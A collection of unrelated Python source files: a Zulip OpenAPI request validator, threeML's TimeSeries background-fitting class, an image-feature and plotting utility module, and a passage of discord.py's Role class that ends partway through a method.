# their `/api/v1` counterpart. This is a legacy code issue that we
# plan to fix by changing the implementation.
SKIP_JSON = {
("/fetch_api_key", "post"),
}
def validate_request(
url: str,
method: str,
data: Union[str, bytes, Dict[str, Any]],
http_headers: Dict[str, str],
json_url: bool,
status_code: str,
intentionally_undocumented: bool = False,
) -> None:
# Some JSON endpoints have different parameters compared to
# their `/api/v1` counterparts.
if json_url and (url, method) in SKIP_JSON:
return
# TODO: Add support for file upload endpoints that lack the /json/
# or /api/v1/ prefix.
if url == "/user_uploads" or url.startswith("/realm/emoji/"):
return
# Now using the openapi_core APIs, validate the request schema
# against the OpenAPI documentation.
mock_request = MockRequest(
"http://localhost:9991/", method, "/api/v1" + url, headers=http_headers, args=data
)
result = openapi_spec.request_validator().validate(mock_request)
if len(result.errors) != 0:
# Requests that do not validate against the OpenAPI spec must either:
# * Have returned a 400 (bad request) error
# * Have returned a 200 (success) with this request marked as intentionally
# undocumented behavior.
if status_code.startswith("4"):
return
if status_code.startswith("2") and intentionally_undocumented:
return
# If no errors are raised, then validation is successful
if len(result.errors) == 0:
return
# Show a block error message explaining the options for fixing it.
msg = f"""
Error! The OpenAPI schema for {method} {url} is not consistent
with the parameters passed in this HTTP request. Consider:
* Updating the OpenAPI schema defined in zerver/openapi/zulip.yaml
* Adjusting the test to pass valid parameters. If the test
fails due to intentionally_undocumented features, you need to pass
`intentionally_undocumented=True` to self.client_{method.lower()} or
self.api_{method.lower()} to document your intent.
See https://zulip.readthedocs.io/en/latest/documentation/api.html for help.
The errors logged by the OpenAPI validator are below:\n"""
for error in result.errors:
msg += f"* {str(error)}\n"
raise SchemaError(msg)
| |
from __future__ import print_function
from __future__ import division
from builtins import zip
from builtins import range
from builtins import object
from past.utils import old_div
__author__ = "grburgess"
import collections
import os
import numpy as np
import pandas as pd
from pandas import HDFStore
from threeML.exceptions.custom_exceptions import custom_warnings
from threeML.io.file_utils import sanitize_filename
from threeML.utils.spectrum.binned_spectrum import Quality
from threeML.utils.time_interval import TimeIntervalSet
from threeML.utils.time_series.polynomial import polyfit, unbinned_polyfit, Polynomial
class ReducingNumberOfThreads(Warning):
pass
class ReducingNumberOfSteps(Warning):
pass
class OverLappingIntervals(RuntimeError):
pass
# find out how many splits we need to make
def ceildiv(a, b):
return -(-a // b)
class TimeSeries(object):
def __init__(
self,
start_time,
stop_time,
n_channels,
native_quality=None,
first_channel=1,
ra=None,
dec=None,
mission=None,
instrument=None,
verbose=True,
edges=None,
):
"""
The EventList is a container for event data that is tagged in time and in PHA/energy. It handles event selection,
temporal polynomial fitting, temporal binning, and exposure calculations (in subclasses). Once events are selected
and/or polynomials are fit, the selections can be extracted via a PHAContainer which is can be read by an OGIPLike
instance and translated into a PHA instance.
:param n_channels: Number of detector channels
:param start_time: start time of the event list
:param stop_time: stop time of the event list
:param first_channel: where detchans begin indexing
:param rsp_file: the response file corresponding to these events
:param arrival_times: list of event arrival times
:param energies: list of event energies or pha channels
:param native_quality: native pha quality flags
:param edges: The histogram boundaries if not specified by a response
:param mission:
:param instrument:
:param verbose:
:param ra:
:param dec:
"""
self._verbose = verbose
self._n_channels = n_channels
self._first_channel = first_channel
self._native_quality = native_quality
# we haven't made selections yet
self._time_intervals = None
self._poly_intervals = None
self._counts = None
self._exposure = None
self._poly_counts = None
self._poly_count_err = None
self._poly_selected_counts = None
self._poly_exposure = None
# ebounds for objects w/o a response
self._edges = edges
if native_quality is not None:
assert len(native_quality) == n_channels, (
"the native quality has length %d but you specified there were %d channels"
% (len(native_quality), n_channels)
)
self._start_time = start_time
self._stop_time = stop_time
# name the instrument if there is not one
if instrument is None:
custom_warnings.warn("No instrument name is given. Setting to UNKNOWN")
self._instrument = "UNKNOWN"
else:
self._instrument = instrument
if mission is None:
custom_warnings.warn("No mission name is given. Setting to UNKNOWN")
self._mission = "UNKNOWN"
else:
self._mission = mission
self._user_poly_order = -1
self._time_selection_exists = False
self._poly_fit_exists = False
self._fit_method_info = {"bin type": None, "fit method": None}
def set_active_time_intervals(self, *args):
raise RuntimeError("Must be implemented in subclass")
@property
def poly_fit_exists(self):
return self._poly_fit_exists
@property
def n_channels(self):
return self._n_channels
@property
def poly_intervals(self):
return self._poly_intervals
@property
def polynomials(self):
""" Returns polynomial is they exist"""
if self._poly_fit_exists:
return self._polynomials
else:
RuntimeError("A polynomial fit has not been made.")
def get_poly_info(self):
"""
Return a pandas panel frame with the polynomial coeffcients
and errors
Returns:
a DataFrame
"""
if self._poly_fit_exists:
coeff = []
err = []
for poly in self._polynomials:
coeff.append(poly.coefficients)
err.append(poly.error)
df_coeff = pd.DataFrame(coeff)
df_err = pd.DataFrame(err)
# print('Coefficients')
#
# display(df_coeff)
#
# print('Coefficient Error')
#
# display(df_err)
pan = {"coefficients": df_coeff, "error": df_err}
return pan
else:
RuntimeError("A polynomial fit has not been made.")
def get_total_poly_count(self, start, stop, mask=None):
"""
Get the total poly counts
:param start:
:param stop:
:return:
"""
if mask is None:
mask = np.ones_like(self._polynomials, dtype=np.bool)
total_counts = 0
for p in np.asarray(self._polynomials)[mask]:
total_counts += p.integral(start, stop)
return total_counts
def get_total_poly_error(self, start, stop, mask=None):
"""
Get the total poly error
:param start:
:param stop:
:return:
"""
if mask is None:
mask = np.ones_like(self._polynomials, dtype=np.bool)
total_counts = 0
for p in np.asarray(self._polynomials)[mask]:
total_counts += p.integral_error(start, stop) ** 2
return np.sqrt(total_counts)
@property
def bins(self):
if self._temporal_binner is not None:
return self._temporal_binner
else:
raise RuntimeError("This EventList has no binning specified")
def __set_poly_order(self, value):
""" Set poly order only in allowed range and redo fit """
assert type(value) is int, "Polynomial order must be integer"
assert (
-1 <= value <= 4
), "Polynomial order must be 0-4 or -1 to have it determined"
self._user_poly_order = value
if self._poly_fit_exists:
print(
"Refitting background with new polynomial order (%d) and existing selections"
% value
)
if self._time_selection_exists:
self.set_polynomial_fit_interval(
*self._poly_intervals.to_string().split(","),
unbinned=self._unbinned
)
else:
RuntimeError("This is a bug. Should never get here")
def ___set_poly_order(self, value):
""" Indirect poly order setter """
self.__set_poly_order(value)
def __get_poly_order(self):
""" get the poly order """
return self._optimal_polynomial_grade
def ___get_poly_order(self):
""" Indirect poly order getter """
return self.__get_poly_order()
poly_order = property(
___get_poly_order, ___set_poly_order, doc="Get or set the polynomial order"
)
@property
def time_intervals(self):
"""
the time intervals of the events
:return:
"""
return self._time_intervals
def exposure_over_interval(self, tmin, tmax):
""" calculate the exposure over a given interval """
raise RuntimeError("Must be implemented in sub class")
def counts_over_interval(self, start, stop):
"""
return the number of counts in the selected interval
:param start: start of interval
:param stop: stop of interval
:return:
"""
# this will be a boolean list and the sum will be the
# number of events
raise RuntimeError("Must be implemented in sub class")
def count_per_channel_over_interval(self, start, stop):
"""
:param start:
:param stop:
:return:
"""
raise RuntimeError("Must be implemented in sub class")
def set_polynomial_fit_interval(self, *time_intervals, **options):
"""Set the time interval to fit the background.
Multiple intervals can be input as separate arguments
Specified as 'tmin-tmax'. Intervals are in seconds. Example:
set_polynomial_fit_interval("-10.0-0.0","10.-15.")
:param time_intervals: intervals to fit on
:param options:
"""
# Find out if we want to binned or unbinned.
# TODO: add the option to config file
if "unbinned" in options:
unbinned = options.pop("unbinned")
assert type(unbinned) == bool, "unbinned option must be True or False"
else:
# assuming unbinned
# could use config file here
# unbinned = threeML_config['ogip']['use-unbinned-poly-fitting']
unbinned = True
# we create some time intervals
poly_intervals = TimeIntervalSet.from_strings(*time_intervals)
# adjust the selections to the data
new_intervals = []
self._poly_selected_counts = []
self._poly_exposure = 0.0
for i, time_interval in enumerate(poly_intervals):
t1 = time_interval.start_time
t2 = time_interval.stop_time
if (self._stop_time <= t1) or (t2 <= self._start_time):
custom_warnings.warn(
"The time interval %f-%f is out side of the arrival times and will be dropped"
% (t1, t2)
)
else:
if t1 < self._start_time:
custom_warnings.warn(
"The time interval %f-%f started before the first arrival time (%f), so we are changing the intervals to %f-%f"
% (t1, t2, self._start_time, self._start_time, t2)
)
t1 = self._start_time # + 1
if t2 > self._stop_time:
custom_warnings.warn(
"The time interval %f-%f ended after the last arrival time (%f), so we are changing the intervals to %f-%f"
% (t1, t2, self._stop_time, t1, self._stop_time)
)
t2 = self._stop_time # - 1.
new_intervals.append("%f-%f" % (t1, t2))
self._poly_selected_counts.append(
self.count_per_channel_over_interval(t1, t2)
)
self._poly_exposure += self.exposure_over_interval(t1, t2)
# make new intervals after checks
poly_intervals = TimeIntervalSet.from_strings(*new_intervals)
self._poly_selected_counts = np.sum(self._poly_selected_counts, axis=0)
# set the poly intervals as an attribute
self._poly_intervals = poly_intervals
# Fit the events with the given intervals
if unbinned:
self._unbinned = True # keep track!
self._unbinned_fit_polynomials()
else:
self._unbinned = False
self._fit_polynomials()
# we have a fit now
self._poly_fit_exists = True
if self._verbose:
print(
"%s %d-order polynomial fit with the %s method"
% (
self._fit_method_info["bin type"],
self._optimal_polynomial_grade,
self._fit_method_info["fit method"],
)
)
print("\n")
# recalculate the selected counts
if self._time_selection_exists:
self.set_active_time_intervals(*self._time_intervals.to_string().split(","))
def get_information_dict(self, use_poly=False, extract=False):
"""
Return a PHAContainer that can be read by different builders
:param use_poly: (bool) choose to build from the polynomial fits
"""
if not self._time_selection_exists:
raise RuntimeError("No time selection exists! Cannot calculate rates")
if extract:
is_poisson = True
counts_err = None
counts = self._poly_selected_counts
rates = old_div(self._counts, self._poly_exposure)
rate_err = None
exposure = self._poly_exposure
elif use_poly:
is_poisson = False
counts_err = self._poly_count_err
counts = self._poly_counts
rate_err = old_div(self._poly_count_err, self._exposure)
rates = old_div(self._poly_counts, self._exposure)
exposure = self._exposure
# removing negative counts
idx = counts < 0.0
counts[idx] = 0.0
counts_err[idx] = 0.0
rates[idx] = 0.0
rate_err[idx] = 0.0
else:
is_poisson = True
counts_err = None
counts = self._counts
rates = old_div(self._counts, self._exposure)
rate_err = None
exposure = self._exposure
if self._native_quality is None:
quality = np.zeros_like(counts, dtype=int)
else:
quality = self._native_quality
container_dict = {}
container_dict["instrument"] = self._instrument
container_dict["telescope"] = self._mission
container_dict["tstart"] = self._time_intervals.absolute_start_time
container_dict["telapse"] = (
self._time_intervals.absolute_stop_time
- self._time_intervals.absolute_start_time
)
container_dict["channel"] = np.arange(self._n_channels) + self._first_channel
container_dict["counts"] = counts
container_dict["counts error"] = counts_err
container_dict["rates"] = rates
container_dict["rate error"] = rate_err
container_dict["edges"] = self._edges
# check to see if we already have a quality object
if isinstance(quality, Quality):
container_dict["quality"] = quality
else:
container_dict["quality"] = Quality.from_ogip(quality)
# TODO: make sure the grouping makes sense
container_dict["backfile"] = "NONE"
container_dict["grouping"] = np.ones(self._n_channels)
container_dict["exposure"] = exposure
# container_dict['response'] = self._response
return container_dict
def __repr__(self):
"""
Examine the currently selected info as well other things.
"""
return self._output().to_string()
def _output(self):
info_dict = collections.OrderedDict()
for i, interval in enumerate(self.time_intervals):
info_dict["active selection (%d)" % (i + 1)] = interval.__repr__()
info_dict["active deadtime"] = self._active_dead_time
if self._poly_fit_exists:
for i, interval in enumerate(self.poly_intervals):
info_dict["polynomial selection (%d)" % (i + 1)] = interval.__repr__()
info_dict["polynomial order"] = self._optimal_polynomial_grade
info_dict["polynomial fit type"] = self._fit_method_info["bin type"]
info_dict["polynomial fit method"] = self._fit_method_info["fit method"]
return pd.Series(info_dict, index=list(info_dict.keys()))
def _fit_global_and_determine_optimum_grade(self, cnts, bins, exposure):
"""
Provides the ability to find the optimum polynomial grade for *binned* counts by fitting the
total (all channels) to 0-4 order polynomials and then comparing them via a likelihood ratio test.
:param cnts: counts per bin
:param bins: the bins used
:param exposure: exposure per bin
:return: polynomial grade
"""
min_grade = 0
max_grade = 4
log_likelihoods = []
for grade in range(min_grade, max_grade + 1):
polynomial, log_like = polyfit(bins, cnts, grade, exposure)
log_likelihoods.append(log_like)
# Found the best one
delta_loglike = np.array(
[2 * (x[0] - x[1]) for x in zip(log_likelihoods[:-1], log_likelihoods[1:])]
)
# print("\ndelta log-likelihoods:")
# for i in range(max_grade):
# print("%s -> %s: delta Log-likelihood = %s" % (i, i + 1, deltaLoglike[i]))
# print("")
delta_threshold = 9.0
mask = delta_loglike >= delta_threshold
if len(mask.nonzero()[0]) == 0:
# best grade is zero!
best_grade = 0
else:
best_grade = mask.nonzero()[0][-1] + 1
return best_grade
def _unbinned_fit_global_and_determine_optimum_grade(self, events, exposure):
"""
Provides the ability to find the optimum polynomial grade for *unbinned* events by fitting the
total (all channels) to 0-4 order polynomials and then comparing them via a likelihood ratio test.
:param events: an event list
:param exposure: the exposure per event
:return: polynomial grade
"""
# Fit the sum of all the channels to determine the optimal polynomial
# grade
min_grade = 0
max_grade = 4
log_likelihoods = []
t_start = self._poly_intervals.start_times
t_stop = self._poly_intervals.stop_times
for grade in range(min_grade, max_grade + 1):
polynomial, log_like = unbinned_polyfit(
events, grade, t_start, t_stop, exposure
)
log_likelihoods.append(log_like)
# Found the best one
delta_loglike = np.array(
[2 * (x[0] - x[1]) for x in zip(log_likelihoods[:-1], log_likelihoods[1:])]
)
delta_threshold = 9.0
mask = delta_loglike >= delta_threshold
if len(mask.nonzero()[0]) == 0:
# best grade is zero!
best_grade = 0
else:
best_grade = mask.nonzero()[0][-1] + 1
return best_grade
def _fit_polynomials(self):
raise NotImplementedError("this must be implemented in a subclass")
def _unbinned_fit_polynomials(self):
raise NotImplementedError("this must be implemented in a subclass")
def save_background(self, filename, overwrite=False):
"""
save the background to an HD5F
:param filename:
:return:
"""
# make the file name proper
filename = os.path.splitext(filename)
filename = "%s.h5" % filename[0]
filename_sanitized = sanitize_filename(filename)
# Check that it does not exists
if os.path.exists(filename_sanitized):
if overwrite:
try:
os.remove(filename_sanitized)
except:
raise IOError(
"The file %s already exists and cannot be removed (maybe you do not have "
"permissions to do so?). " % filename_sanitized
)
else:
raise IOError("The file %s already exists!" % filename_sanitized)
with HDFStore(filename_sanitized) as store:
# extract the polynomial information and save it
if self._poly_fit_exists:
coeff = []
err = []
for poly in self._polynomials:
coeff.append(poly.coefficients)
err.append(poly.covariance_matrix)
df_coeff = pd.Series(coeff)
df_err = pd.Series(err)
else:
raise RuntimeError("the polynomials have not been fit yet")
df_coeff.to_hdf(store, "coefficients")
df_err.to_hdf(store, "covariance")
store.get_storer("coefficients").attrs.metadata = {
"poly_order": self._optimal_polynomial_grade,
"poly_selections": list(
zip(
self._poly_intervals.start_times,
self._poly_intervals.stop_times,
)
),
"unbinned": self._unbinned,
"fit_method": self._fit_method_info["fit method"],
}
if self._verbose:
print("\nSaved fitted background to %s.\n" % filename)
def restore_fit(self, filename):
filename_sanitized = sanitize_filename(filename)
with HDFStore(filename_sanitized) as store:
coefficients = store["coefficients"]
covariance = store["covariance"]
self._polynomials = []
# create new polynomials
for i in range(len(coefficients)):
coeff = np.array(coefficients.loc[i])
# make sure we get the right order
# pandas stores the non-needed coeff
# as nans.
coeff = coeff[np.isfinite(coeff)]
cov = covariance.loc[i]
self._polynomials.append(Polynomial.from_previous_fit(coeff, cov))
metadata = store.get_storer("coefficients").attrs.metadata
self._optimal_polynomial_grade = metadata["poly_order"]
poly_selections = np.array(metadata["poly_selections"])
self._poly_intervals = TimeIntervalSet.from_starts_and_stops(
poly_selections[:, 0], poly_selections[:, 1]
)
self._unbinned = metadata["unbinned"]
if self._unbinned:
self._fit_method_info["bin type"] = "unbinned"
else:
self._fit_method_info["bin type"] = "binned"
self._fit_method_info["fit method"] = metadata["fit_method"]
# go thru and count the counts!
self._poly_fit_exists = True
# we must go thru and collect the polynomial exposure and counts
# so that they be extracted if needed
self._poly_exposure = 0.0
self._poly_selected_counts = []
for i, time_interval in enumerate(self._poly_intervals):
t1 = time_interval.start_time
t2 = time_interval.stop_time
self._poly_selected_counts.append(
self.count_per_channel_over_interval(t1, t2)
)
self._poly_exposure += self.exposure_over_interval(t1, t2)
self._poly_selected_counts = np.sum(self._poly_selected_counts, axis=0)
if self._time_selection_exists:
self.set_active_time_intervals(*self._time_intervals.to_string().split(","))
def view_lightcurve(self, start=-10, stop=20.0, dt=1.0, use_binner=False):
raise NotImplementedError("must be implemented in subclass")
| |
__author__ = 'rico'
from copy import deepcopy
import cv2
import os.path
import cPickle as pickle
import matplotlib.pyplot as plt
import numpy as np
def visualize_color_image(img, title=''):
plt.figure()
plt.title(title)
plt.imshow(cv2.cvtColor(img, cv2.COLOR_HSV2RGB))
def basic_image_check(img, title):
print 'max of img ' + title + ' ', np.max(img)
print 'dtype of img ' + title + ' ', img.dtype
plt.figure()
plt.title(title)
plt.imshow(img)
def visualize_apc_sample_data_dict(apc_sample):
basic_image_check(apc_sample.data_dict['depth'], 'depth')
basic_image_check(apc_sample.data_dict['mask_image'], 'mask_image')
basic_image_check(
apc_sample.data_dict['dist2shelf_image'], 'dist2shelf_image')
basic_image_check(apc_sample.data_dict['height3D_image'], 'height3D_image')
def visualize_apc_sample_feature(apc_sample):
visualize_color_image(apc_sample.image)
basic_image_check(apc_sample.feature_images['depth'], 'depth')
basic_image_check(apc_sample.bin_mask, 'mask_image')
basic_image_check(
apc_sample.feature_images['dist2shelf'], 'dist2shelf_image')
basic_image_check(apc_sample.feature_images['height3D'], 'height3D_image')
class Utils:
HUE_WHITE = 180
HUE_GRAY = 181
HUE_BLACK = 182
@staticmethod
def gaussian(x, mu, sigma):
return np.exp(-(x - mu) ** 2.0 / (2.0 * sigma ** 2.0))
@staticmethod
def backproject(histogram, image):
if len(image.shape) > 1:
return histogram[image.reshape(-1)].reshape(image.shape)
else:
return histogram[image]
@staticmethod
def hsv2hwgb(image): # hue white gray black
"""transform an hsv image to a single channel image with values 0-179 for hues, 180 for white, 181 for gray, and 182 for black """
unsaturated = np.clip(1 * (image[:, :, 1] < 90) + 1 * (image[:, :, 2] < 20), 0, 1) # 150
dark = 1 * (image[:, :, 2] < 50)
bright = 1 * (image[:, :, 2] > 200)
image_hue = np.copy(image[:, :, 0])
return (unsaturated * bright * Utils.HUE_WHITE + unsaturated * (1 - dark) * (1 - bright) * Utils.HUE_GRAY + unsaturated * dark * Utils.HUE_BLACK + (1 - unsaturated) * image_hue).astype('uint8')
@staticmethod
def hwgb2hsv(hwgb):
"""transform a single channel (hue white gray black) image to an hsv image"""
image = 255 * np.ones(list(hwgb.shape) + [3])
image[:, :, 0] = hwgb
saturated = 1 * (hwgb < 180)[:, :, None]
white = 1 * (hwgb == 180)[:, :, None]
gray = 1 * (hwgb == 181)[:, :, None]
black = 1 * (hwgb == 182)[:, :, None]
image_black = np.zeros(image.shape).astype('int')
image_white = np.zeros(image.shape).astype('int')
image_white[:, :, 2] = 255
image_gray = np.zeros(image.shape).astype('int')
image_gray[:, :, 2] = 128
return (saturated * image + white * image_white + gray * image_gray + black * image_black).astype('uint8')
@staticmethod
def hsv2edge_image(image):
# 70 / 210
edge_image = (cv2.Canny(image[:, :, 2], 80, 240) / 255.0).astype('uint8')
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11)).astype('uint8')
return cv2.dilate(edge_image, kernel, iterations=1)
@staticmethod
def load_mask(filename):
result = cv2.imread(filename, 0)
if result is not None:
return result.astype('bool')
@staticmethod
def load_image(filename):
return cv2.cvtColor(cv2.imread(filename), cv2.COLOR_BGR2HSV)
@staticmethod
def load_supplementary_data(filename):
# load pickled data, skip if it does not exist
if os.path.isfile(filename):
with open(filename) as f:
data = pickle.load(f)
return data
@staticmethod
def compute_feature_images(image, data):
feature_images = dict()
# compute all feature images
rgb_image = cv2.cvtColor(image, cv2.COLOR_HSV2RGB)
feature_images['red'] = image[:, :, 0]
feature_images['green'] = image[:, :, 1]
feature_images['blue'] = image[:, :, 2]
feature_images['hue'] = image[:, :, 0]
feature_images['saturation'] = image[:, :, 1]
feature_images['value'] = image[:, :, 2]
feature_images['color'] = Utils.hsv2hwgb(image)
feature_images['edge'] = Utils.hsv2edge_image(image)
feature_images['miss3D'] = (1 * (data['has3D_image'] == 0)).astype('uint8')
feature_images['dist2shelf'] = np.clip(data['dist2shelf_image'].astype('uint8'), 0, 100)
feature_images['height3D'] = np.clip((data['height3D_image'] + 0.1) * 500, 0, 255).astype('uint8')
feature_images['height2D'] = np.clip((data['height2D_image'] + 0.1) * 500, 0, 255).astype('uint8')
feature_images['depth'] = data['depth_image']
return feature_images
class Display:
def __init__(self, bin_mask=None):
#plt.ion()
self.heatmap = plt.get_cmap('coolwarm')
#self.heatmap = plt.get_cmap('jet')
self.heatmap.set_bad('w', 1.)
self.bin_mask = None
self.figure_num = 0
def set_bin_mask(self, bin_mask):
self.bin_mask = bin_mask.astype('bool')
contours, hierarchy = cv2.findContours(self.bin_mask.astype('uint8'), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if self.bin_mask is not None:
x, y, w, h = cv2.boundingRect(contours[0])
self.xlim = [x, x + w]
self.ylim = [y + h, y]
def figure(self, title):
if title is None:
title = str(self.figure_num)
self.figure_num += 1
fig = plt.figure(title)
fig.clear()
def set_limits(self):
if self.bin_mask is not None:
plt.xlim(self.xlim)
plt.ylim(self.ylim)
plt.axis('off')
def plot_heat_image(self, image, mask=None, title=None, colorbar_label='', vmin=None, vmax=None):
self.figure(title)
if mask is None:
mask = self.bin_mask
else:
if self.bin_mask is not None:
mask = np.logical_and(mask, self.bin_mask)
if mask is not None:
image = np.ma.array(image, mask=np.logical_not(mask))
plt.imshow(image, interpolation='nearest', cmap=self.heatmap, vmin=vmin, vmax=vmax)
# cb = plt.colorbar()
# cb.set_label(colorbar_label)
self.set_limits()
def plot_image(self, image, title=None):
self.figure(title)
image = cv2.cvtColor(image, cv2.COLOR_HSV2RGB)
if self.bin_mask is not None:
image[np.logical_not(self.bin_mask)] = np.zeros(image[np.logical_not(self.bin_mask)].shape) + 255
plt.imshow(image.astype('uint8'), interpolation='nearest')
self.set_limits()
def plot_color_image(self, color_image, title=None):
self.figure(title)
self.plot_image(Utils.hwgb2hsv(color_image), title=title)
def plot_segment(self, image, segment, title=None):
self.figure(title)
image = cv2.cvtColor(image, cv2.COLOR_HSV2RGB)
alpha = 0.3
image[np.logical_not(segment)] = alpha * image[np.logical_not(segment)] + (1 - alpha) * np.array([[150, 150, 150]])
image[np.logical_not(self.bin_mask)] = np.zeros(image[np.logical_not(self.bin_mask)].shape) + 255
plt.imshow(image.astype('uint8'), interpolation='nearest')
self.set_limits()
def plot_contours(self, image, contours, title=None):
self.figure(title)
image = cv2.cvtColor(image, cv2.COLOR_HSV2RGB)
image[np.logical_not(self.bin_mask)] = np.zeros(image[np.logical_not(self.bin_mask)].shape) + 255
for cnt in contours:
cv2.drawContours(image, [cnt], 0, (0, 255, 0), 2, lineType=8)
plt.imshow(image.astype('uint8'), interpolation='nearest')
self.set_limits()
def plot_color_likelihood(self, color_likelihood, title=None):
self.figure(title)
width = 10.0
plt.bar(range(180), color_likelihood[:180], color=plt.get_cmap('hsv')((np.arange(183) * 255.0 / 180.0).astype('int')), width=1)
plt.bar(180 + width * np.arange(3), color_likelihood[180:183] / width, color=['white', 'gray', 'black'], width=width)
plt.xlim([0, 180 + width * 3])
plt.xticks([])
plt.xlabel('Color')
plt.ylim([0, 0.05])
plt.yticks([])
plt.ylabel('Probability density')
plt.axis('off')
def plot_binary_likelihood(self, binary_likelihood, xlabel='0 / 1', title=None):
self.figure(title)
width = 10.0
plt.bar(width * np.arange(2), binary_likelihood, color=self.heatmap([0, 255]), width=width)
plt.xlim([0, width * 2])
plt.xticks([])
plt.xlabel(xlabel)
plt.ylim([0, 1])
plt.yticks([])
plt.ylabel('Probability density')
def plot_edge_likelihood(self, edge_likelihood, title=None):
self.plot_binary_likelihood(edge_likelihood, xlabel='No edge / edge ', title=title)
def plot_miss3D_likelihood(self, miss3D_likelihood, title=None):
self.plot_binary_likelihood(miss3D_likelihood, xlabel='No 3D info / 3D info ', title=title)
def plot_range_likelihood(self, range_likelihood, xmin=0, xmax=1, xlabel='', title=None):
self.figure(title)
# plt.bar(range(range_likelihood.size), color=self.heatmap(xrange.astype('int')), width=width)
xrange = np.linspace(xmin, xmax, range_likelihood.size)
width = xrange[1] - xrange[0]
plt.bar(xrange, range_likelihood, color=self.heatmap(np.linspace(0, 255, range_likelihood.size).astype('int')), width=width)
plt.xlim([xmin, xmax + width])
plt.xlabel(xlabel)
plt.ylim([0, 0.2])
plt.yticks([])
plt.ylabel('Probability density')
# execute this function and you can use utils.display in every other module
def global_display():
global display
display = Display()
| |
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-2017 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
from .permissions import Permissions
from .errors import InvalidArgument
from .colour import Colour
from .mixins import Hashable
from .utils import snowflake_time
class Role(Hashable):
"""Represents a Discord role in a :class:`Guild`.
.. container:: operations
.. describe:: x == y
Checks if two roles are equal.
.. describe:: x != y
Checks if two roles are not equal.
.. describe:: x > y
Checks if a role is higher than another in the hierarchy.
.. describe:: x < y
Checks if a role is lower than another in the hierarchy.
.. describe:: x >= y
Checks if a role is higher or equal to another in the hierarchy.
.. describe:: x <= y
Checks if a role is lower or equal to another in the hierarchy.
.. describe:: hash(x)
Return the role's hash.
.. describe:: str(x)
Returns the role's name.
Attributes
----------
id: int
The ID for the role.
name: str
The name of the role.
permissions: :class:`Permissions`
Represents the role's permissions.
guild: :class:`Guild`
The guild the role belongs to.
colour: :class:`Colour`
Represents the role colour. An alias exists under ``color``.
hoist: bool
Indicates if the role will be displayed separately from other members.
position: int
The position of the role. This number is usually positive. The bottom
role has a position of 0.
managed: bool
Indicates if the role is managed by the guild through some form of
integrations such as Twitch.
mentionable: bool
Indicates if the role can be mentioned by users.
"""
__slots__ = ('id', 'name', 'permissions', 'color', 'colour', 'position',
'managed', 'mentionable', 'hoist', 'guild', '_state' )
def __init__(self, *, guild, state, data):
self.guild = guild
self._state = state
self.id = int(data['id'])
self._update(data)
def __str__(self):
return self.name
def __repr__(self):
return '<Role id={0.id} name={0.name!r}>'.format(self)
def __lt__(self, other):
if not isinstance(other, Role) or not isinstance(self, Role):
return NotImplemented
if self.guild != other.guild:
raise RuntimeError('cannot compare roles from two different guilds.')
if self.position < other.position:
return True
if self.position == other.position:
return int(self.id) > int(other.id)
return False
def __le__(self, other):
r = Role.__lt__(other, self)
if r is NotImplemented:
return NotImplemented
return not r
def __gt__(self, other):
return Role.__lt__(other, self)
def __ge__(self, other):
r = Role.__lt__(self, other)
if r is NotImplemented:
return NotImplemented
return not r
def _update(self, data):
self.name = data['name']
self.permissions = Permissions(data.get('permissions', 0))
self.position = data.get('position', 0)
self.colour = Colour(data.get('color', 0))
self.hoist = data.get('hoist', False)
self.managed = data.get('managed', False)
self.mentionable = data.get('mentionable', False)
self.color = self.colour
def is_default(self):
"""Checks if the role is the default role."""
return self.guild.id == self.id
@property
def created_at(self):
"""Returns the role's creation time in UTC."""
return snowflake_time(self.id)
@property
def mention(self):
"""Returns a string that allows you to mention a role."""
return '<@&%s>' % self.id
@property
def members(self):
"""Returns a list of :class:`Member` with this role."""
all_members = self.guild.members
if self.is_default():
return all_members
return [member for member in all_members if self in member.roles]
@asyncio.coroutine
def _move(self, position, reason):
if position <= 0:
raise InvalidArgument("Cannot move role to position 0 or below")
if self.is_default():
raise InvalidArgument("Cannot move default role")
if self.position == position:
return # Save discord the extra request.
http = self._state.http
change_range = range(min(self.position, position), max(self.position, position) + 1)
sorted_roles = sorted((x for x in self.guild.roles if x.position in change_range and x.id != self.id),
key=lambda x: x.position)
roles = [r.id for r in sorted_roles]
if self.position > position:
roles.insert(0, self.id)
else:
roles.append(self.id)
payload = [{"id": z[0], "position": z[1]} for z in zip(roles, change_range)]
yield from http.move_role_position(self.guild.id, payload, reason=reason)
@asyncio.coroutine
def edit(self, *, reason=None, **fields):
"""|coro|
Edits the role.
You must have the :attr:`Permissions.manage_roles` permission to
use this.
All fields are optional.
Parameters
-----------
name: str
The new role name to change to.
permissions: :class:`Permissions`
The new permissions to change to.
colour: :class:`Colour`
The new colour to change to. (aliased to color as well)
hoist: bool
Indicates if the role should be shown separately in the member list.
mentionable: bool
Indicates if the role should be mentionable by others.
position: int
The new role's position. This must be below your top role's
position or it will fail.
reason: Optional[str]
The reason for editing this role. Shows up on the audit log.
Raises
-------
Forbidden
You do not have permissions to change the role.
HTTPException
Editing the role failed.
InvalidArgument
An invalid position was given or the default
role was asked to be moved.
"""
position = fields.get('position')
if position is not None:
yield from self._move(position, reason=reason)
self.position = position
try:
colour = fields['colour']
except KeyError:
colour = fields.get('color', self.colour)
payload = {
'name': fields.get('name', self.name),
'permissions': fields.get('permissions', self.permissions).value,
'color': colour.value,
'hoist': fields.get('hoist', self.hoist),
'mentionable': fields.get('mentionable', self.mentionable)
}
